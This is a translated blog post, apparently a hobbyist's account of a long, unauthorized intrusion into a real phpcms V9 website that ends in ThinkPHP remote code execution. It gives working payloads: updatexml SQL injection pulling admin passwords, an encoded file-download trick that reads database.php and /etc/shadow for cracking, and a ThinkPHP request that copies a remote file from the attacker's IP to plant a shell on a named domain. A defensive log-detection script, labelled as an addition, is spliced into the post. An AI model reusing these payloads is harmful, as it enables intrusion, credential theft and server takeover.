A long-drawn-out penetration test: from phpcms to thinkphp

0X01 Foreword 

This site has been my target since the day I started learning penetration testing; I just wanted to get it eventually.

Maybe my information-gathering skills are poor, which is why I made no progress and could not find a way in. This is something that has to be built up slowly; I need to study harder.

0X02 Newbie penetration

At the very beginning I blindly scanned everything: subdomains, the C segment, IPs, ports, neighbouring sites, directories, services, fingerprints, WAF detection, every method found online. But I did not know why I was scanning these things, or what the point of the results was.

This is what I want to understand; if anything here is lacking, please share your thoughts.

1. Neighbouring sites (旁站)
Neighbouring sites are different sites on the same IP, for example two IIS sites such as www.xxx.com and www.xxx2.com. If you take any one of them, the others are yours too, but if another service is started it can no longer occupy port 80.
2. C segment
If your IP is 192.168.1.1, then 192.168.1.1-254 are considered the C segment. This is generally hard to break into; the intranet approach involves the various unauthorized-access vulnerabilities that follow.
3. Ports
See which services the open ports correspond to and look for vulnerabilities in them.
4. Fingerprinting
Quickly and accurately identify the site's language, CMS and so on, so you do not waste time trying blindly.
5. WAF identification
sqlmap parameters:
python2 sqlmap.py -u "https://www.example.com" --identify-waf --batch
Or use the tool Wafw00f.
6. Directories
Sensitive directories.

When I first learned penetration testing, my approach was: look for parameters, find an injection point, get into the backend, take a shell. I only knew to look for places like id=1 and then blindly throw them into sqlmap.

Of course, this site could not have an injection point as crude as id=1.

Then... I could not find much. I looked at robots.txt and saw only admin.php, and had no idea what to do with it. So I shelved the site, figuring that if I kept learning slowly I would eventually get it.

0X03 Making some headway

The fingerprint showed phpcms, so I searched Google for phpcms V9 getshell.

There is a direct front-end getshell???

Simon's post at http://ximcx.cn/post-126.html explains it very clearly.

But our site does not have front-end user registration enabled; it may even be a customized phpcms.

So, with no direct front-end getshell, the next step is injection.

Step one: obtain the user authentication cookie

/index.php?m=wap&c=index&a=init&siteid=1

Step two

Take the userid_flash value that is returned (userid_flash = 686dzK2pLsN_cv_pbJlCjvsm-ex_mCiOG90mXzt4), pass it on, and build the SQL statement:
/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=%*27+and+updatexml(1%2cconcat(1%2c((select+password+from+v9_admin+limit+0%2c1)))%2c1)%23%26m%3d1%26f%3dhaha%26modelid%3d2%26catid%3d7%26

The encoded value returned here is passed as a parameter to step three.

Step three

/index.php?m=content&c=down&a_k=

Construct the updatexml error-based injection.

I have been testing this site for two days.
Framework: PHPCMS V9
1. Idea one: the injection point runs as root, so write a shell. I know the path and could write it with a UNION query, but I ran into a problem:
   1. mysqld restricts import / export:
        --secure_file_priv=null
2. Idea two: stacked injection, to add my own user to the admin table, but stacked injection is not available.
3. WDCP is open on 8080; weak-password brute forcing got nothing. Brute-forced a round of directories; nothing of value.
4. Use the injection point to read the WDCP account password, but phpcms v9 here uses updatexml error-based injection:
SELECT * FROM `网站的v9数据库名`.`cd_download_data` WHERE `id` = '' and updatexml(1,concat(1,((select passwd from wd_member where table_schema=wdcpdb limit 0,1))),1)#' LIMIT 1
MySQL Error : Table '网站的v9数据库名.wd_member' doesn't exist 
The error-based query here can only read from the site's own database. I am short on ideas and asking for advice; no result either.
5. Hoping the masters will share some ideas; as a newbie I am struggling.

This is the help request I posted on T00ls at the time; it lists all the problems I ran into, so starting from the injection point had to be abandoned as well.

Idea three: phpcms V9.2 arbitrary file download. Even though outbound connections were not open, I thought: if I read out the database password and the SSH password, I could connect directly with Xshell, or try those passwords against the backend login.

Here I hit a problem. Since the server runs Kali (Linux), not Windows, and this CMS filters php file downloads, we need to construct the filename so that Linux resolves it as php. Here is my construction method:

phpcms filters * and /\. Testing on my own machine, both "1.php " (trailing space) and "1.php*" are resolved as 1.php, but here constructing 1.php* did not work for some reason; after many tries only "1.php " with a trailing space worked.

http://www.ccc.com/index.php?m=attachment&c=attachments&a=swfupload_json&src=a%26i=1%26m=1%26catid=1%26f=.%2*fcaches%2*fconfigs%2*fdatabase.php%2*520%2526modelid%3d1%2526d%3d1%26aid%3d1
index.php?m=content&c=down&a=init&a_k=

The first file to download is of course the database configuration file: check the password, then try that weak password against other logins.

The second file read was /etc/shadow, followed by cracking the hashes. They cracked, but unfortunately port 22 is not exposed externally...

Online I read that auth_key might be useful, so I tried reading it. That attempt was the turning point: it revealed a neighbouring site!!!

You get it, right? This site did not show up when scanning with the other neighbouring-site scanning tools.

Then ThinkPHP (TP) remote code execution. This also took a long time: many functions were banned and only phpinfo could be executed, so in the end I used the simple, brute approach:

http://www.rongxinlaw.com/?s=captcha&Fuck=copy("http://你的ip/50.txt","test.php")
_method=__construct&filter=assert&method=get&server[REQUEST_METHOD]=Fuck
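As an added defensive example (not code from the original post): a small Python log-triage script that flags the three request shapes this writeup relies on, the phpcms swfupload_json double-encoded injection, the "*"-wedged percent-encoding used for the file download, and the ThinkPHP 5 `_method=__construct` plus `filter=` request. The log format and every request line are constructed for the example; the rule names are my own.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed request log (not from the original post): "client method url body" per
# line, body "-" for GET. The payload shapes mirror the ones quoted in the writeup.
SAMPLE_REQUESTS = """\
203.0.113.5 GET /index.php?m=wap&c=index&a=init&siteid=1 -
203.0.113.5 GET /index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=%*27+and+updatexml(1%2cconcat(1%2c((select+password+from+v9_admin+limit+0%2c1)))%2c1)%23%26m%3d1 -
203.0.113.5 GET /index.php?m=attachment&c=attachments&a=swfupload_json&src=a%26i=1%26m=1%26catid=1%26f=.%2*fcaches%2*fconfigs%2*fdatabase.php%2*520 -
203.0.113.5 POST /?s=captcha _method=__construct&filter=assert&method=get&server[REQUEST_METHOD]=x
198.51.100.7 GET /index.php?m=content&c=index&a=lists&catid=7 -
"""

SQLI_RE = re.compile(r"\b(updatexml|extractvalue)\s*\(|\band\s+\w+\s*\(", re.I)
STAR_ENC_RE = re.compile(r"%[0-9a-f]\*[0-9a-f]", re.I)  # '*' wedged into a %XX escape
TP_RCE_RE = re.compile(r"(^|&)_method=__construct(&|$)", re.I)


def classify(method, url, body):
    """Return the names of the detection rules that fire for one request."""
    hits = []
    query = urlsplit(url).query
    qs = parse_qs(query, keep_blank_values=True)
    if qs.get("a") == ["swfupload_json"] and "src" in qs:
        # phpcms strips '*' and decodes src a second time, so inspect both layers
        src_once = qs["src"][0]
        src_twice = unquote(src_once.replace("*", ""))
        if SQLI_RE.search(src_twice):
            hits.append("phpcms_swfupload_sqli")
        if STAR_ENC_RE.search(src_once):
            hits.append("phpcms_star_encoded_path")
    blob = query + "&" + body  # ThinkPHP reads these from either GET or POST
    if TP_RCE_RE.search(blob) and re.search(r"(^|&)filter=", blob):
        hits.append("thinkphp5_method_construct_rce")
    return hits


def scan(log_text):
    """Parse the constructed log and return [(client, rule), ...] for every hit."""
    findings = []
    for line in log_text.splitlines():
        client, method, url, body = line.split(" ", 3)
        for rule in classify(method, url, "" if body == "-" else body):
            findings.append((client, rule))
    return findings


if __name__ == "__main__":
    for client, rule in scan(SAMPLE_REQUESTS):
        print(f"{client}\t{rule}")
```

The second decode after removing "*" is what lets the script see the real SQL; matching only the raw query string would miss it.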

Finally. At last, at last.

On the road of learning, less is more and slow is fast.

Origin www.cnblogs.com/-zhong/p/11201064.html